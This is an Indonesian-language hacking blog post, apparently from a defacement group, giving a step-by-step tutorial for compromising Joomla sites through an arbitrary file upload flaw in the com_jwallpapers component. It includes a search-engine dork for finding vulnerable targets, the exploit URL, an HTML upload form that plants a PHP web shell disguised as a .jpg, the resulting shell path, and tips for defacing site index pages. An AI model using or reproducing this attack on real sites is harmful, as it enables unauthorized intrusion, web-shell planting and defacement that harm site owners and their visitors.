yoehh Gengs, lanjut lagi Walking Blog :D , Nah kali ini Gue cuma mau berbagi tentang salah satu Exploit Joomla(salah satu Bug/Celah pada CMS Joomla).
Yupz, Tutorial Deface CMS Joomla dengan eXploit Component com_jwallpapers Arbitrary File Upload.
Teknik Exploit Joomla yang memiliki Vulnerabilitas pada Component jwallpapers di CMS Joomla. hahaha, ini eXploit masih Hot banget, hasil riset dari indoXploit juga *tengkyuh ster
Let's Play with me Baby ;*
Dork:
inurl:/index.php?option=com_jwallpapers
(Selebihnya kebangin lg menggunakan imajinasi vokepers kalian, biar dpt yg vuln n verawan)
eXploit:
/index.php?option=com_jwallpapers&task=upload
1. Dorking menggunakan Search Engine
2. pilih salah satu web yg pen ditusb0l, Lalu masukan exploitnya.
cth: target.coli/index.php?option=com_jwallpapers&task=upload
3. Vulnerability ~ {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
CSRF Xploit Code:
<html>
<body>
<form method="post" action="target.c0li/index.php?option=com_jwallpapers&task=upload" enctype="multipart/form-data">
<input type="file" name="file"/>
<input type="hidden" name="name" value="shell_kalian.php" />
<input type="submit" value="submit"/>
</form>
</body>
</html>
NB:
Ubah bagian shell_kalian.php dengan nama shell yang kalian ingin kan ( ex: shell.php ), dan juga shell yang kalian upload harus ber-extensi .jpg (ex: shell.jpg). Tanpa harus menggunakan tamper data dan sebagainya.
4. Jika sudah ada yg vuln, lanjut copy nih Uploader CSRF nya, save dgn ekstensi .html & buka dgn browser kalean.
inget, shell harus berekstensi .jpg , dan nanti nama shell kalian ke ubah seperti yg kalean tulis di csrf, ektensinya juga jadi .php |
Setelah Kalian Xploit, maka hasilnya akan tetap sama seperti ini:
tidak ada tulisan error sama sekali. |
http://target.com/jwallpapers_files/plupload/shell_kalian.php
Gimana Mau PhP, HTML aja masih belajar :'D |
kalo mau deface saya sarankan nitip file aja yak, kalo mau nebas index (JANGAN LUPA DI BACK UP DUANCOK :) ))
Jadilah Dispenser yg Baik, saat anda berhasil MengEksploitasi suatu web, Usahakan laporkan Bug, dan kalo bisa sih bantu Patch secara Sukarela *Tetap hargai para WebMaster ;*
"Tidak semua website bisa di eksploitasi dgn teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar kak.
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih
bila ada kritik, dan pertanyaan langsung aja kak ke wall fanspage kami: TKJ CYBER ART
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Happy Joomla Hacked~
Sekian dan semoga bermanfaat .. terimakasih
Source and thanks to: Mr. Error 404 - IndoXploit
./Nuenomaru
Kami bikin Sejarah, Bukan hanya Barisan Kisah |
Visit and follow :
FP : TKJ Cyber Art
G+ : TKJ Cyber Art
youtube : TKJ Cyber Art
BBM : C0018D1A2
Line : http://line.me/ti/p/%40hjl8740i
0 komentar:
Posting Komentar